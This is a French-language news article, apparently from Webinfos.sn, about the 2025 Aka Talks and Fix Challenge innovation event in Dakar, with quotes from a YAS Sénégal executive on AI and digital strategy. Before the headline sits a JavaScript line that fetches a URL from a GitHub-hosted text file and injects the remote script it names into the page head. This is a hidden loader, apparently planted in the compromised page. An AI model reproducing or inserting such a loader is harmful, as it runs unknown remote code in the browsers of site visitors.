;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); AKA TALKS ET FIX CHALLENGE 2025: L’INNOVATION SÉNÉGALAISE CÉLÉBRÉE AU SEANEMA PLAZZA DE DAKAR – Webinfos.sn
Le plaisir de s'informer juste et vrai, en temps réel !

CLIQUEZ SUR L'IMAGE POUR NOUS SOUTENIR

AKA TALKS ET FIX CHALLENGE 2025: L’INNOVATION SÉNÉGALAISE CÉLÉBRÉE AU SEANEMA PLAZZA DE DAKAR

0 279

 

 

C’est dans une ambiance chaleureuse et dynamique que s’est tenue, ce samedi 29 juin, la quatrième édition de Aka Talks et du Fix Challenge, un événement phare dédié à l’innovation et à l’accompagnement des jeunes talents sénégalais.

Organisé au Seanema Plazza de Dakar, en présence de plusieurs personnalités, dont Birame DIOP TOURÉ, Secrétaire Général de YAS Sénégal, en compagnie de ses collègues, Roland ZANG Directeur Marketing, de Madame Nafi DIAGNE, Directrice de la Transformation et de l’Innovation, mais également des hauts responsables de Orange Sénégal, du Groupe IZI, pour ne citer que ceux là.

Ce rendez-vous technologique a mis en lumière les projets les plus prometteurs en matière de numérique, d’intelligence artificielle et d’objets connectés.

À l’initiative de l’organisation Akatox, en partenariat avec YAS Sénégal, ont organisé ledit événement de haute facture, pour promouvoir des jeunes talents.
Cette édition a récompensé cinq lauréats qui se sont distingués par la qualité et l’originalité de leurs innovations. Les prix décernés, allant de 2 à 10 millions de francs CFA, ont principalement porté sur des domaines stratégiques comme l’e-santé, l’IA et l’Internet des objets (IoT).

《Nous croyons profondément que chaque jeune Sénégalais regorge de talent, mais il est souvent difficile pour eux de faire éclore ce potentiel》, a déclaré Monsieur Birame DIOP TOURÉ, Secrétaire Général de YAS Sénégal, qui poursuit:
《C’est pourquoi nous les accompagnons à travers un processus de sélection rigoureux, piloté par des experts, pour mettre en valeur les meilleurs projets》.

Une stratégie numérique pour un Sénégal innovant

L’événement a également été l’occasion pour YAS Sénégal de réaffirmer son engagement en faveur de l’économie numérique. L’entreprise investit massivement dans l’intelligence artificielle, la 5G et la formation professionnelle, afin de positionner le Sénégal comme un acteur majeur du numérique sur le continent.

Des séminaires ont déjà été organisés à l’attention des journalistes, pour les initier aux outils de l’IA et repenser leurs pratiques rédactionnelles, aussi bien sur le papier que dans les médias numériques et audiovisuels.

《L’IA ne remplacera pas l’humain, mais elle sera un levier indispensable à son efficacité》, a insisté Monsieur Birame DIOP TOURÉ, avertissant: 《Il arrivera un moment où avancer sans elle sera tout simplement impossible》.

Vers un « New Deal technologique »

YAS Sénégal s’inscrit résolument dans le « New Deal Technologique » souhaité par le Président de la République Bassirou Diomaye FAYE.
Avec une couverture globale en haut débit, en téléphonie mobile et en services numériques, l’entreprise ambitionne de devenir un pilier central de la Vision Sénégal 2050.

La Directrice de la Transformation et de l’Innovation de YAS Sénégal, Nafi DIAGNE, mène ce chantier stratégique avec rigueur, en mettant l’accent sur l’inclusion technologique et le renforcement du capital humain.

《Nous disposons des outils, des ressources humaines et des financements nécessaires pour accompagner cette jeunesse sénégalaise, pour qu’elle puisse rivaliser avec les géants du numérique dans le monde》, a conclut Monsieur le Secrétaire Général de YAS Sénégal.

 

Laisser un commentaire

Votre adresse email ne sera pas publiée.